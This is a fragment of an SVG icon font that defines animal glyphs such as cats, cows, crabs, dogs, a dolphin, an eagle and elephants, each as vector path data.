<glyph glyph-name="cat-face" horiz-adv-x="1000" unicode="&#xe83c;" d="M917 415c-21 109-46 217-74 325-2 9-6 16-16 18-10 3-17-2-23-11-11-15-23-30-34-44-36-49-72-97-107-146-4-5-7-7-13-4-7 4-14 6-20 8-54 16-109 19-164 16-39-2-78-8-115-23-7-3-11-2-15 4-47 63-94 126-141 189-6 8-13 13-23 11-9-2-14-9-16-18-15-60-30-121-43-181-20-87-39-175-49-264-6-59 6-114 38-164 5-7 8-7 15-3 46 24 92 48 139 72 7 4 15 4 22-1 6-5 9-12 7-20-1-8-7-12-14-16-43-22-86-45-130-67-8-4-7-7-1-12 8-7 15-15 23-23 5-6 9-5 16-2 38 21 77 41 115 61 12 6 24 3 29-8 6-10 2-21-10-27-6-4-13-7-19-10-29-15-58-30-88-46 171-119 424-116 591 2-10 5-20 10-29 15l-75 39c-12 6-15 17-10 28 5 9 17 12 28 7 1 0 3-1 4-2 36-19 72-37 108-56 7-4 12-4 17 2 7 7 14 14 21 21 8 9 8 9-2 14-42 22-84 43-125 65-10 5-14 13-13 22 2 14 16 21 31 13 45-23 90-46 134-70 5-2 8-3 11 2 27 44 43 90 40 141-3 49-11 96-20 143z m-700-31c-4 33 6 37 33 41 78 12 164-45 180-130 3-12-2-20-13-25-18-8-42-13-61-13-73 1-130 54-139 127z m400-198c-33-58-67-115-100-173-10-17-27-17-37 1l-100 172c-10 18-2 33 19 33 33 0 66 0 100 0 33 0 66 0 99 0 21 0 30-14 19-33z m54 73c-8-1-15-1-22-2-21 1-41 5-60 13-13 5-17 13-14 26 17 78 87 133 167 130 11 0 21-2 31-5 11-3 16-9 16-21-2-63-40-128-118-141z m-235-79c-6 0-6-2-3-6l34-60c10-18 21-35 32-54 23 40 45 79 69 120-45 0-89 0-132 0z m-67 157c-27 32-61 51-104 50-4 0-8 0-7-7 9-48 51-83 102-83 6 0 14 1 22 3 4 1 6 2 4 7-5 11-10 21-17 30z m369 50c-49 1-100-33-118-79-3-5-2-7 4-8 8-2 15-3 20-3 51 0 90 32 102 80 3 9 0 10-8 10z" />
<glyph glyph-name="cat" horiz-adv-x="1000" unicode="&#xe83d;" d="M933 33c-14 2-28 3-42 5-36 4-72 12-107 25-49 18-91 46-125 87-20 24-39 50-58 75-27 34-57 64-94 85-40 23-83 38-127 48-51 12-103 16-164 17-9 1-27-1-44 1-32 3-54 18-67 47-9 19-10 39-10 59 0 34 3 68 11 101 5 22 11 44 21 64 2 4 3 9 3 14 1 19-14 34-32 35-20 0-35-15-35-35 0-34 0-68 1-101 2-32 5-64 9-95 6-47 16-92 33-136 12-33 27-64 46-94 56-87 131-150 230-183 38-12 76-20 115-24 28-3 55-5 83-5 4 0 5 1 5 5-1 6-1 11 0 17 0 5-2 6-7 6-43 0-87 4-129 14-34 8-66 19-94 40-15 12-29 26-35 46-6 19-3 37 13 51 14 13 32 16 50 13 22-4 41-13 60-24 40-23 79-49 118-75 63-42 131-71 205-87 36-8 73-13 109-18 18-2 37-4 55-6 4 0 6 1 6 5 0 6 1 12 1 18 1 4 0 5-4 5z m-272 159c44-23 98-15 136 19 25 22 46 72 39 92-10-25-29-41-56-42-32-2-53 14-65 43-12-29-33-46-66-43-27 1-45 17-55 44-3-42 20-90 67-113z m-1 194c27-3 45-18 55-44 10 26 28 41 55 44 27 2 48-10 63-34v124c-2-3-3-4-4-6-15-20-30-41-45-62-2-3-3-5-7-2-41 23-82 23-124 0-3-2-4-2-6 1-11 16-22 31-33 47-5 7-11 14-16 22v-125c14 25 34 37 62 35z m73-63c0-23 19-42 42-43 24 0 43 20 43 43 0 23-19 42-42 43-23 0-43-19-43-43z m-79 43c-23 0-42-19-42-43 0-23 19-42 42-42 24-1 43 19 43 42 0 23-19 43-43 43z" />
<glyph glyph-name="cow-head" horiz-adv-x="1000" unicode="&#xe83e;" d="M211 485c-22 15-41 30-57 48-60 68-47 134 35 173 49 24 103 36 158 38-23-17-50-29-73-49-44-39-43-72 4-107 30-22 64-36 99-49 10-4 19-4 30 0 62 20 124 20 186 0 3-1 6-2 9-2 37-6 143 57 155 92 8 25-7 43-23 59-23 24-53 37-79 56 69-6 137-18 194-61 37-28 43-66 22-113-16-37-47-60-85-88 54-2 97-18 135-45 23-17 21-27 0-42-65-47-131-58-203-17-10 6-21 17-26-6-17-83-37-167-43-253-2-19 0-38 6-57 16-51 3-79-52-93-70-17-142-19-212 4-53 17-63 38-45 89 15 47 2 92-4 136-9 57-22 112-33 169-4 19-9 21-27 11-74-40-143-32-208 21-14 12-16 19 0 33 31 25 59 38 137 53z m298-513c27-2 62 6 95 25 32 18 33 46 3 67-49 34-162 35-212 1-30-20-31-43-1-66 30-24 67-27 115-27z m-305 392c21 0 48 11 74 26 28 16 27 35-1 52-59 38-133 32-188-14-9-8-15-13-2-23 33-23 67-40 117-41z m599 1c42-1 77 16 109 39 7 6 14 10 3 21-48 49-144 56-198 14-20-16-19-33 1-46 27-17 55-29 85-28z m-172-27c-1 15-9 25-22 26-16 1-26-9-26-24 0-14 9-23 23-24 15 0 22 9 25 22z m-214-1c0 16-8 26-21 27-15 1-25-8-25-24 0-14 8-23 22-24 14 0 22 9 24 21z" />
<glyph glyph-name="cow" horiz-adv-x="1000" unicode="&#xe83f;" d="M276 485c4 20 7 36 34 33 14-2 26 9 33 21 9 15 11 28-14 27-16 0-32 0-50 0 28 49 29 61 12 83-24-60-31-63-85-66-51-3-75 23-88 69-13-33-5-59 19-86-18 0-31 1-43 0-10-2-28 8-31-9-3-16 10-27 23-34 8-5 18-7 27-7 9 1 15 0 18-12 7-37 23-73 23-112 0-27 10-37 36-39 15 0 31 0 46 3 14 2 20 9 20 23-1 37 14 70 20 106z m-36-105c-6-8-10 0-15 2-13 3-27 5-39-2-6-3-10-8-15 1-4 6-2 12 2 17 27 38 23 77 4 117-15 31-6 46 27 47 37 0 46-15 31-47-18-39-23-78 3-115 4-7 7-13 2-20z m661-274c0 24 5 48-18 66-9 5-6 15-3 23 7 18 14 36 22 58 20-25 36-47 34-78-1-36 1-71 0-106-1-9-1-16 1-20h-45c9 7 9 23 9 57z m-413-57h-42c1 3 0 8-1 13-7 43-19 86-15 130 0 10-7 29 15 24 15-4 41 6 40-26-1-41 0-83 0-124-1-8 0-13 3-17z m330 19c-4-9-5-15-3-19h-45c12 31 32 63 27 96-4 34-20 65-31 98-4 14-11 12-19 3l-3-2c-51-47-130-41-155-37-50 8-100 17-150 26-13 2-25 6-24-15 0-53 0-106 0-159 0-4 1-8 2-10h-43c2 3 2 8 1 16-12 86-24 172-78 246-32 44-23 98-10 146 12 42 47 63 91 64 152 1 303 1 455 0 57 0 100-39 103-96 3-60 1-120 1-180-3 0-6 0-9-1-13 29-1 61-7 90-8 1-8-6-9-9-32-86-62-172-94-257z" />
<glyph glyph-name="crab" horiz-adv-x="1000" unicode="&#xe840;" d="M628 745c89-27 144-93 189-169 6-10 8-16-6-21-12-4-23-13-34-21-8-6-12-5-18 3-10 13-22 24-32 37-14 18-33 26-56 29-25 2-49 8-72 17-29 12-43 33-40 63 14-13 27-27 42-37 13-7 25-14 39-17 15-3 29-2 38 11 9 13 5 27-3 39-16 25-41 40-68 52-7 4-17 4-21 14 0 0 42 0 42 0z m-216 0c-2-8-9-8-14-11-22-9-42-20-59-36-8-7-14-15-19-25-5-11-7-22 1-33 8-11 19-14 32-12 27 4 47 19 66 36 7 5 13 12 19 18 6-20-3-41-24-54-20-13-42-18-64-22-7-1-15-3-22-3-24-1-43-11-58-30-7-10-16-19-24-28-17-20-10-20-35-4-6 4-12 10-19 12-20 6-16 16-7 30 38 62 83 118 152 149 11 5 22 8 34 12l41 1z m32-187c14-8 17-19 20-29 4-13 6-27 9-41 2-9 5-15 16-7 4 3 10 5 14 2 15-10 18 0 21 11 6 18 12 37 23 52 3 5 7 10 12 6 6-5-2-7-4-11-9-14-11-30-12-46 0-10 7-11 14-13 42-16 83-34 119-62 22-16 35-36 28-65-14-67-40-128-96-170-76-55-184-39-249 35-30 35-48 74-58 119-9 38 6 63 37 83s64 34 99 46c11 4 14 9 14 20 0 22-3 44-7 70z m-267-6c3-1 5-3 7-4 43-28 84-58 123-91 10-8 13-13 1-23-28-25-27-26-58-2-26 20-52 41-74 65-16 18-17 34-5 50 2 2 2 5 6 5z m659-26c-2-12-6-21-13-29-29-30-61-56-95-80-10-7-17-5-24 3-2 3-5 5-7 8-19 19-19 19 3 37 34 27 69 53 106 78 6 3 12 12 17 8 8-6 12-16 13-25z m102-87c-25-61-57-112-109-150-21-15-42-30-66-41-20-8-40-10-61-4-6 2-10 5-6 13 5 8 8 17 13 26 1 4 3 7 9 5 20-11 38-1 56 6 66 25 115 70 151 130 2 3 5 7 8 11 0 1 1 1 5 4z m-874 0c14-23 29-45 45-65 36-43 82-69 133-87 9-3 19-5 29-3 5 1 12 9 17 2 7-11 11-24 16-36 1-3-5-4-8-5-21-7-41-5-60 4-83 38-140 100-173 185-1 1 0 2 1 5z m9-168c71-44 149-51 229-44 16 2 16-9 20-16 15-24 14-29-13-27-82 4-160 22-226 74-4 3-10 6-10 13z m849-4c-15-20-36-32-59-43-51-23-105-36-161-41-12-1-31-2-34 7-4 12 11 24 17 36 3 5 8 1 13 0 62-6 123 1 182 21 15 5 28 13 42 20z m-671-291c-14 42-2 79 20 115 19 32 47 57 71 85 3 5 6 5 9 2 4-3 8-5 12-7 24-16 24-16 1-34-19-15-39-29-58-45-34-31-58-67-55-116z m497 0c3 59-31 97-72 130-18 14-35 27-53 40-7 6-10 11 1 18 27 17 27 18 49-6 30-32 60-65 74-108 8-25 10-50 1-74z m-140-21c3 47-11 90-31 131-4 7-8 14-11 22-4 10-16 22-9 31 7 10 23 3 36 4 5 1 6-2 8-7 10-42 22-85 19-129-1-18-2-36-12-52z m-218 0c-13 29-14 60-11 90 3 30 11 59 18 88 2 8 4 11 12 10 37-1 44 8 23-35-24-49-46-97-42-153z" />
<glyph glyph-name="crocodile" horiz-adv-x="1000" unicode="&#xe841;" d="M893 490c-34 36-95 50-133 32 17-17 33-33 50-51-1-2-2-7-4-12 6-1 11-1 18-2-5-6-8-10-12-14 8-4 15-7 23-11l-21-9c6-6 10-11 17-18-8 1-12 2-19 3v-15c-4 5-7 8-10 11l-14-19c-5 7-9 13-14 20l-13-21c-5 8-9 14-14 21-5-7-9-13-13-20l-15 19c-5-7-9-13-14-19-5 7-8 13-13 20l-14-21c-5 8-9 14-14 21l-13-20-15 20c-4-7-8-13-13-20l-14 19c-5-7-9-13-14-19l-14 20-14-20c-5 8-9 13-14 20-4-7-8-13-12-20-6 7-11 13-16 19l-13-19c-4 7-9 13-14 21-6-10-10-17-14-22-42 3-81 10-128 8 1 0 2-1 3-1 2 0 3 0 5 0 12 0 22-5 22-12s-10-12-22-12c-6 0-11 2-15 4-2 0-4 0-6 0-12 0-21 5-21 12s9 12 21 12c3 0 5-1 7-1-8 4-20 6-32-7-5-5-12-11-18-12-36-7-72-14-109-18-25-2-53-5-75 4-32 13-41 5-49-19-12-37-2-76 47-69 88 12 171-17 259-28 0-18 0-33 0-48 1-17 9-27 27-27 18 1 24 12 24 29 0 10 0 21 0 32l6-1c0-11 0-23 1-34 0-17 8-26 25-26 17 0 25 10 25 26 1 12 1 24 1 36h278c0-12 0-22 0-33 1-16 6-28 24-29 18-1 27 8 28 28 1 11 1 23 1 34h5c0-12-1-24 0-36 1-16 8-26 25-26 17 0 26 10 27 25 0 15-1 30 0 45 1 8 4 17 10 22 71 61 77 160 13 228z m-583-195c-77-1-155 0-232 0-2 0-3 1-5 3 95 2 191-12 285 13-11-15-31-16-48-16z m30 90c0-3-3-5-7-5-4 0-8 2-8 5 0 3 4 6 8 6s7-3 7-6z m29-5c0-3-3-6-7-6-4 0-8 3-8 6 0 3 4 5 8 5s7-2 7-5z" />
<glyph glyph-name="deer-head" horiz-adv-x="1000" unicode="&#xe842;" d="M608 239c9 8 16 14 24 20 17 14 35 27 59 27 10 0 21 3 30 8 10 5 10 1 9-8-4-31-22-54-46-72-16-12-33-20-51-25-9-3-14-7-18-15-24-50-37-102-40-157-1-27-6-55-23-78-25-36-80-36-105 0-16 23-21 49-22 76-3 55-16 108-40 158-4 8-9 13-18 16-30 9-57 24-77 49-12 15-19 32-21 51-1 6 1 9 7 6 15-7 32-8 49-12 22-4 38-20 55-34 4-3 7-6 11-10 2 25-11 39-28 52-26 19-55 35-84 49-55 27-91 70-116 125-23 52-43 105-48 162 0 8-1 15 1 23 1 3 1 6 4 6 4 1 5-2 7-5 9-16 14-35 18-53 3-12 6-24 12-34 2-3 4-6 7-6 4 1 5 5 5 9 1 17 0 34-1 52-4 48-6 97 4 146 1 5 2 9 4 14 2 4 3 10 9 8 5-1 7-6 8-11 1-9-1-19-1-28 0-13-4-29 10-35 13-6 23 6 32 15 15 14 29 28 48 37 6 4 13 6 20 9 3 1 5 1 7-2 3-3 1-6-1-8-6-6-12-12-18-18-10-8-20-15-30-23-38-29-61-67-64-115-3-50 2-99 26-144 13-25 30-46 55-60 5-3 11-8 17-4 5 4 2 11 1 16-6 29-7 59-8 88-1 41-9 82-12 123-2 14-3 28 1 43 0 2 0 4 2 5 4 1 5-2 6-4 2-5 4-10 5-15 2-11 9-11 17-7 10 6 15 15 20 24 4 9 9 17 18 22 3 2 7 3 11 1 4-3 3-8 1-11-3-7-7-13-11-19-8-13-17-26-26-39-3-6-7-13-8-19-2-7-4-15 5-18 8-4 11 3 15 9 7 11 13 23 20 34 5 10 11 19 19 26 7 6 15 11 25 8-2-10-10-15-14-23-2-3-5-7-3-11 3-3 7-3 11-2 11 2 21 7 32 6 3 0 6 1 8-2 2-5-2-7-5-9-16-13-34-25-50-38-44-36-60-83-53-138 3-23 6-46 14-69 5-12 11-23 23-29 17-9 34-1 47 20 6 10 10 20 14 31 7 19 14 39 28 55 3 4 8 11 15 6 6-4 5-11 2-17-13-26-20-54-29-81-9-30 0-49 28-63 31-14 60-11 87 9 17 13 22 29 16 49-10 29-17 59-31 86-3 6-4 14 3 18 7 3 11-3 15-8 13-16 20-35 27-54 5-14 11-27 20-39 16-21 39-21 55 1 11 15 14 32 18 49 5 32 10 64 3 96-10 42-38 70-71 94-10 8-20 15-31 23-2 1-5 3-4 7 1 4 5 3 8 3 9 0 18-2 27-5 5-2 12-4 16 2 4 5-2 9-5 14-2 3-5 6-8 10-2 2-6 6-3 9 2 1 7 1 10 0 11-3 19-11 25-20 10-16 19-32 28-48 4-6 8-13 16-9 8 4 7 13 4 20-6 17-17 31-27 45-5 8-10 15-15 23-3 6-7 13-1 18 7 4 13-2 17-6 6-5 10-12 13-18 4-9 9-17 17-22 10-6 15-4 19 7 2 6 3 18 9 17 7-1 6-13 6-20 0-28-4-56-8-83-4-30-6-60-7-91-1-21-3-43-7-64-1-5-4-12 2-16 5-3 11 1 16 3 29 16 48 42 61 71 23 53 28 108 16 164-10 44-41 74-77 99-10 8-20 15-29 25-2 2-6 6-3 10 2 4 6 2 10 1 24-7 42-22 59-39 7-7 14-14 22-19 13-8 24-3 26 13 2 11 1 23 0 35 0 2-1 3-1 5 1 7-1 18 9 19 8 2 9-8 11-15 8-30 9-62 8-94 0-31-3-62-4-93 0-9-5-23 6-25 8-2 10 13 13 21 7 20 10 41 18 61 3 6 5 16 12 14 6-2 6-12 5-19-1-25-5-50-12-75-12-40-26-78-45-115-25-50-63-85-113-110-26-13-51-27-75-44-17-13-32-27-31-54z" />
<glyph glyph-name="dog-alt" horiz-adv-x="1000" unicode="&#xe843;" d="M901 223c12-6 23-10 37-11-1 1-1 2-1 2-57 28-105 67-146 114-5 6-9 12-8 20 0 8-1 16-2 24-6 45-28 76-73 90-24 8-49 11-74 12-30 0-60 0-90 0-37 0-75 1-112 10-38 9-72 26-97 58-2 3-5 6-7 9-12-18-27-33-42-48-12-11-25-22-36-34-24-26-29-54-17-87 7-18 17-35 28-51 2-3 4-7 4-11 2-65 3-130 0-195-2-32-4-63-11-94-1-5 0-5 4-5 14 0 27 0 41 0 6 0 7 2 8 6 1 15 4 29 7 42 3 8 5 17 11 24 1-1 1-2 1-2 0-22-2-44-10-65-2-5-1-5 4-5 10 0 20 0 31 0 3 0 4 1 6 4 4 14 7 28 10 42 5 30 5 61 8 91 4 30 13 57 37 77 11 9 23 17 36 23 39 16 79 27 119 37 22 6 41 1 57-15 4-5 9-9 14-14 19-21 38-42 56-63 18-21 35-43 46-68 9-20 13-41 7-63-4-15-12-28-23-40-2-3-3-5-2-8 1-4 4-3 7-3 13 0 26 0 39 0 4 0 6 1 7 5 3 9 5 19 6 28 3 23 3 45 4 68 1 8 1 16 3 24 1 3 2 5 6 2 22-23 31-50 26-82-2-14-6-27-9-40-1-4-1-5 4-5 11 0 22 0 33 0 4 0 6 1 6 5 4 40 3 81 1 121 0 3-1 4-3 6-26 21-45 49-58 80-9 22-15 45-16 71 3-3 5-5 7-7 35-32 73-60 116-79z m-591 345c2 3 2 5 0 8-12 18-24 37-36 55-10 14-21 26-36 35-24 12-48 10-73 3-1 0-3-1-3-2-7-17-21-25-37-31-16-6-33-9-50-13-10-3-12-5-12-16 0-15 11-38 24-47 21-13 44-14 67-6 2 1 5 2 8 1 27-7 49-20 59-47 2-4 4-4 8-3 36 9 62 31 81 63z" />
<glyph glyph-name="dog-barking" horiz-adv-x="1000" unicode="&#xe844;" d="M467 186c-35-75-56-154-57-239-24 18-53 87-66 153-60-39-108-91-159-144 4 76 25 143 65 205-30 3-117 3-187-32 36 84 81 158 161 208-28 6-55 6-81 3-27-4-53-8-80-13 45 56 99 100 169 128-22 18-42 36-65 50-22 14-47 24-71 35 11 1 22 3 33 4 49 4 98 1 146-7 5-1 8-3 10-9 5-20 12-40 23-60 10 6 20 11 30 16-25 46-29 96-24 146 5 44 19 85 44 123 25-55 50-109 74-160 25 1 50 3 74 3 44-1 88-9 128-29 18-10 35-9 54-7 76 9 151 18 228 15 7 0 14 0 21-1-4-22-8-42-13-63 0-2-1-3-2-5-14-18-28-36-43-55-5 16-9 32-15 49-15-18-29-36-44-55-4 16-8 31-12 48-15-18-28-35-43-54-5 17-9 33-14 51-15-20-29-38-44-57-5 17-9 33-14 51-7-14-13-26-20-37-16-25-25-51-23-81 1-11 0-21 0-34 15 19 28 37 43 56 5-17 10-33 14-51 15 19 29 38 44 57l14-47c14 18 27 35 41 53 5-17 9-33 14-50 15 19 30 37 45 56 4-15 7-28 10-41 1-3 0-6-2-9-9-18-18-35-28-53-2-3-6-5-9-5-105-5-209-21-309-50-30-9-58-23-87-35-3-2-7-4-13-7 9 39 17 75 25 112-27 6-54 6-83-2 17 36 34 70 51 105-10 5-20 9-30 15-30-60-59-119-89-180 37 12 70 30 109 32-11-50-22-99-33-151 30 18 59 34 88 51l2-2z m158 349c-35 12-69 25-107 17 12-28 32-45 59-54 1 0 3-1 4-1 20 1 38 17 44 38z" />
<glyph glyph-name="dog" horiz-adv-x="1000" unicode="&#xe845;" d="M810-59c-16 20-28 42-33 69-32 159-66 318-99 476-3 12-5 19-21 17-60-7-112 12-154 55-13 13-17 8-22-5-38-99-86-194-117-296-21-71-45-141-68-211-15-45-32-49-67-18-12 10-22 35-39 25-17-10-5-34-3-51 8-54 39-85 93-87 74-3 148-1 222-1v-1h171c14 0 29-1 43 0 11 0 23 1 27 14 4 14-10 17-19 22-23 12-49 16-75 22-18 4-27 12-30 32-5 50-32 87-73 115-19 14-41 22-61 34-8 6-26 8-20 21 5 12 20 5 32 3 7-1 13-5 20-7 26-12 49-26 71-44 20-16 29-12 38 11l5 15c3 8 4 19 13 19 10 0 11-11 14-19 15-43 29-87 43-130 7-21 19-38 36-50 19-14 38-28 52-46 6-8 15-16 25-7 10 8 2 16-4 23z m-176 581c13 4 35-8 40 11 12 39 45 57 74 79 24 19 40 43 49 73 9 31-1 46-35 47-37 2-73 2-110 3-26 1-45 11-55 36-3 6-1 17-11 16-9 0-10-9-13-15l-70-167c-5-11 0-19 7-26 33-37 74-56 124-57z" />
<glyph glyph-name="dolphin" horiz-adv-x="1000" unicode="&#xe846;" d="M937-21c-2-5-5-5-8 1-6 10-16 15-25 22-12 7-25 14-37 20-3 1-5 2-7 2-15-1-26 5-36 15-8 8-14 8-20-1-9-15-22-24-38-29-19-5-33-15-45-31-2-3-6-5-9-8-6-3-7-3-8 4-2 13 1 27 6 39 15 43 37 81 60 120 2 3 2 5 0 9-19 34-42 65-68 94-23 26-48 51-74 73-29 26-60 49-91 72-49 35-100 66-153 96-9 5-19 10-28 14-4 2-5 5-3 9 6 8 13 16 21 23 5 5 3 9 0 13-3 5-7 2-10 0-6-3-10-8-14-14-15-21-23-46-32-70-7-21-13-42-18-64-11 8-17 18-22 30-10 25-13 52-15 79-1 10-1 20-1 29 0 4-1 7-5 9-25 14-53 22-81 30-25 7-51 12-77 14-16 1-32 6-36 22 0 4-1 7 0 10 3 8 10 13 18 17 15 8 31 13 47 16 5 1 9 4 12 8 24 40 59 63 103 73 29 7 58 8 87 5 51-4 100-18 147-38 4-1 6-1 9 1 26 20 54 33 86 38 28 4 54 0 79-12 2-2 5-4 5-7 0-3-3-4-6-5-7-2-15-5-21-9-23-16-34-39-39-65-2-6 0-9 5-13 28-22 54-46 78-73 41-45 72-96 96-152 12-28 22-58 29-88 12-50 15-101 13-153 0-4 1-7 5-9 21-13 40-28 57-46 20-21 37-43 50-69 6-12 11-25 14-38 0-5 1-9 0-13z m-374 156c-38 25-81 32-125 29-37-3-71-15-105-31-46-21-95-30-146-30-25 0-50 3-75 8-2 1-4 2-6 0-1-2 0-4 1-6 3-6 9-10 14-14 19-15 42-23 65-28 48-10 95-3 141 15 25 9 49 21 75 28 49 14 100 17 150 10 9-2 18-3 27-5 6 0 4 3 3 6-5 8-11 14-19 18z m-14 123c-53 25-107 26-163 10-22-6-42-17-64-25-66-27-135-32-206-19-3 1-8 4-10 0-1-3 3-7 5-10 0-1 1-1 2-2 9-10 21-17 34-22 60-25 119-22 178 1 19 7 37 16 55 23 57 20 116 25 176 15 8-1 16-2 24-4 6 1 2 5 1 7-8 12-20 20-32 26z" />
<glyph glyph-name="duck-tracks" horiz-adv-x="1000" unicode="&#xe847;" d="M928 361c-27-95-97-145-180-183 0 2-1 5-1 7 6 93 1 185-9 277-1 9-2 21-12 21-11 1-9-13-11-21 0-2 0-4 0-6-1-45 3-90 6-134 2-43 4-85-9-126-7-21-9-22-25-7-33 30-68 58-98 91-15 16-29 32-42 49 4-47 23-88 55-122 35-36 79-63 121-92 9-6 20-6 26 3 20 32 55 47 84 69 32 26 65 50 89 84 17 24 21 64 6 90z m-615-67c-15-14-18-13-25 7-7 23-8 47-9 70-2 47 4 93 6 139 1 22 3 45-1 67-1 6-2 13-9 12-8 0-9-7-11-12-1-3-1-7-1-11-9-79-14-158-11-237 0-15 9-38-1-43-12-7-26 13-40 20-67 30-109 83-136 149-2 4-2 8-8 8-9-34-5-65 16-93 21-27 48-47 73-68 32-27 72-43 97-78 6-8 16-9 26-2 16 11 32 22 47 33 54 38 105 78 124 146 3 11 8 22 4 38-41-59-92-101-141-145z m-74 11c-3 85-8 167 6 251-49-43-87-99-167-89 48-65 85-132 161-162z m522-106c77 31 114 97 161 162-79-9-118 46-167 89 14-84 10-166 6-251z m-463 109c51 36 93 76 127 123 8 11 6 15-6 19-46 16-82 42-104 86-4 9-9 17-21 22 10-83 6-165 4-250z m317-31c26-27 54-52 89-75-5 85-6 167 2 252-14-10-20-21-25-31-18-36-47-58-84-73-6-2-11-5-18-7-12-3-10-8-4-17 12-17 26-33 40-49z" />
<glyph glyph-name="eagle-head" horiz-adv-x="1000" unicode="&#xe848;" d="M776 252c25 0 50-4 74-10 31-8 59-23 88-35-47 54-107 85-178 102 36 24 76 21 117 32-54 20-103 39-162 41 36 20 68 30 104 44-62 24-121 37-186 43 35 45 82 71 123 106-20 5-35-2-52-3-101-8-200-25-298-54-87-26-161-71-208-153-18-32-17-32 18-41 66-17 59-7 66-70 3-19 12-13 21-12 124 24 245 9 362-35 59-22 113-54 168-84-51 45-102 89-148 140 30-13 60-12 91-11z m-355 151c-12-5-28-9-8-25 7-6 2-11-1-16-11-14-37-17-52-7-27 20-27 20-67 22 49 35 96 59 161 41-14-6-23-11-33-15z m-178-110c-22 0-42 7-61 18-5 3-10 5-17 4-48-7-111-56-102-126 24 26 53 37 84 44 29 8 59 11 89 8 26-3 29 9 27 29-1 14-4 23-20 23z" />
<glyph glyph-name="eaten-fish" horiz-adv-x="1000" unicode="&#xe849;" d="M221 212c-44 14-84 8-122 14-32 6-40 18-35 47 19 100 81 171 158 231 34 27 71 48 110 67 47 22 55 16 56-33 2-45 5-89 7-134 1-15 2-22 22-19 56 6 57 5 53 60-1 18-4 39 18 41 24 2 20-22 22-38 1-12 0-25 5-35 6-12 19-4 28-2 17 5 7 17 7 29-2 18-29 43 1 54 33 11 28-25 36-43 6-13 7-31 31-25 21 6 28 16 18 37-8 16 2 26 15 30 15 4 18-10 24-20 7-11-1-33 23-31 17 2 26 15 34 29 27 51 54 101 82 152 19 34 28 34 48 2 32-49 31-56-5-103-38-49-38-49 9-91 16-14 32-28 48-41 21-18 35-34 11-62-36-42-51-46-83-21-37 29-74 58-111 88-8 6-14 12-24 7-10-6-3-14-3-21 0-10 5-22-9-26-15-4-26 2-30 17-5 21-16 22-35 17-18-6-25-11-15-29 6-12-4-20-14-25-12-5-21 1-24 13-6 27-25 25-45 19-25-6-17-25-16-41 1-15 8-36-13-39-24-3-22 20-27 36-4 10 9 37-18 27-22-8-64 11-62-39 4-59 5-118 9-176 2-35-13-54-45-64-58-19-117-30-176-7-41 16-46 36-20 72 9 13 19 25 29 38 8 11 17 23 28 38z m34 158c-1 23-8 31-22 32-16 0-26-8-25-24 1-14 11-24 26-23 14 1 21 10 21 15z" />
<glyph glyph-name="elephant-alt" horiz-adv-x="1000" unicode="&#xe84a;" d="M197 608c-8 16-15 30-28 40-14 12-29 13-41 5-12-8-13-16-2-25 10-9 14-19 8-31-7-14-19-16-32-12-16 5-33 12-38 31-5 19 3 35 17 49 11 11 18 19 32 24 7 3 24 4 33-1 36-20 47-42 51-80z m50 40c9 5 17 3 25-3 8-7 3-12-1-18-4-8-2-15 5-20 12-7 25-5 36 2 12 7 15 17 11 29-9 34-56 47-81 22-14-13-20-31-25-53 6 11 10 18 14 26 4 6 9 11 16 15z m689-539c-2-5-6-10-12-7-8 3-15 0-22-1-15-3-31-4-44 3-16 8-22 0-27-12-9-19-15-40-17-61-1-11-3-19-10-20-22-5-90 0-90 0 2 9 3 12 3 17-1 6-1 13-9 14-9 0-10-7-11-13 0-6 1-12 2-18h-91c-12 49-29 94-49 138-17 37-42 65-76 86-30 17-57 39-85 58-8 5-11 9-2 17 8 6 22 14 10 26-11 10-22 0-29-8-8-10-14-9-23-1-59 51-112 105-141 179-6 16-11 32-14 49-1 4-5 12 5 13 8 1 14 4 17-8 14-47 40-88 73-125 18-20 39-38 67-45 17-4 33-1 46 11 25 23 52 26 83 16 6-2 13-3 18-6 43-19 88-19 134-14 65 9 130 3 190-29 48-26 75-65 74-121 0-27-12-51-24-74-6-12-13-24-19-37-6-15 0-25 15-27 14-1 30-7 42 6 5 5 11-1 16-1 3 0 1-3 0-5z m-481 269c0 5-3 8-8 8-5 0-8-2-9-8 0-5 3-9 8-9 6 0 9 3 9 9z m220 2c-30 8-60 3-87-11 22 4 43 8 66 6 29-3 39-15 30-44-14-40-37-74-68-103-31-28-45-26-70 7 5-28 31-42 55-26 48 32 83 76 96 134 5 19-3 32-22 37z m-41-370h0 0z" />
<glyph glyph-name="elephant-head-alt" horiz-adv-x="1000" unicode="&#xe84b;" d="M553 488c-12-6-16-17-18-29-4-33 1-65 7-97 0-1 0-2 0-5-7 3-15 5-22 7-28 9-56 5-78-13-16-13-34-22-49-36-37-32-51-87-32-132 4-10 4-18-2-26-11-19-22-37-36-54-4-6-7-7-12-1-37 44-54 95-60 152-8 76 9 148 39 217 25 60 51 119 70 182 11 37 35 62 71 75 62 23 123 46 188 56 55 9 107 2 148-40 31-32 48-71 57-114 19-89-9-167-57-240-23-36-53-67-90-89-18-11-36-17-58-12-21 5-33 17-32 40 0 19-11 35-18 51-11 25-19 51-22 78-1 11 1 21 6 30z m-163-1c-9 0-18 1-27-2-7-2-13-5-13-14 0-9 5-15 12-17 8-3 16-4 24 7-5-2-6-3-7-3-9-2-17-1-19 9-2 9 7 10 13 13 6 2 12 1 17 7z m5-29c-10-10-12-13-32-12 12-10 23-7 32 12z m-8 40c-12 0-24 3-34-4 11 2 23-3 34 4z m-217-585c16 14 31 28 46 41 73 65 127 144 169 232 23 49 44 98 57 150 2 6 6 10 11 13 16 9 34 12 52 9 14-1 21-13 16-28-10-36-25-69-43-102-39-72-92-135-145-197-43-48-94-85-151-114-3-2-6-3-8-4-1-1-2 0-4 0z m366 201c-3-23-20-32-46-27-27 5-44 36-34 62 8 18 25 23 42 26 38 7 87-22 92-63 4-30-9-51-32-69-22-16-48-22-75-22-38 0-74 10-107 29-7 4-8 6-3 13 13 16 24 32 36 49 6 7 14 6 21-4 6-9 12-18 20-24 23-17 53-19 74-4 13 9 18 20 12 34z" />
